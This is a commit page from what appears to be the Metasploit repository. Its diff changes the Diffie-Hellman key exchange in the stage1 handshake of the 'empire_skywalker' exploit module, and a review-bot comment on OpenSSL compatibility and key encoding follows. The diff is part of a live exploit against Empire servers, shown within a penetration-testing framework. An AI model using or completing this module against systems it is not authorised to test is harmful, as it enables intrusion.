
Commit 706dc60

committed
Use built-in Diffie-Hellman
1 parent 5984988 commit 706dc60


1 file changed

+13
-3
lines changed

1 file changed

+13
-3
lines changed

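--- a/modules/exploits/linux/http/empire_skywalker.rb
+++ b/modules/exploits/linux/http/empire_skywalker.rb
@@ -11,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
 GENERATOR = 2
 PRIME = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF
-KEYLENGTH = 540
 STAGE0 = 1
 STAGE1 = 2
 STAGE2 = 3
@@ -247,8 +246,19 @@ def exploit
 send_data_to_stage(staging_key, dummy, staging_key, STAGE0, session_id)
 
 # stage1
-private_key = SecureRandom.hex(KEYLENGTH).hex
-public_key = GENERATOR.pow(private_key, PRIME).to_s.encode('UTF-8')
+dh = OpenSSL::PKey::DH.new(
+OpenSSL::ASN1::Sequence([
+OpenSSL::ASN1::Integer(PRIME),
+OpenSSL::ASN1::Integer(GENERATOR)
+]).to_der
+)
+if OpenSSL::PKey.respond_to?(:generate_key)
+dh = OpenSSL::PKey.generate_key(dh)
+else
+dh.generate_key!
+end
+private_key = dh.priv_key.to_i
+public_key = dh.pub_key.to_s
 res = send_data_to_stage(staging_key, public_key, staging_key, STAGE1, session_id)
 fail_with(Failure::Unknown, 'Failed to send the key to STAGE1') unless res && res.code == 200
 vprint_good('Successfully sent the key to STAGE1')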
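Review bot: The `respond_to?(:generate_key)` branch in the stage1 block carries no comment saying why two key-generation paths exist, so a later cleanup could drop one of them and break the module on one family of OpenSSL bindings. I would put above it `# OpenSSL 3.0 pkeys are immutable, so generate_key! cannot be used there; older openssl gems lack OpenSSL::PKey.generate_key`. On the last added line, `dh.pub_key.to_s` relies on OpenSSL::BN#to_s defaulting to base 10 to match the decimal string the removed Integer#to_s produced; `public_key = dh.pub_key.to_s(10)` makes that wire format explicit. The removed `.encode('UTF-8')` is no longer applied, which is presumably harmless for a digit-only string but is worth confirming against what `send_data_to_stage` joins it with. `exploit` starts and ends outside the hunk.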
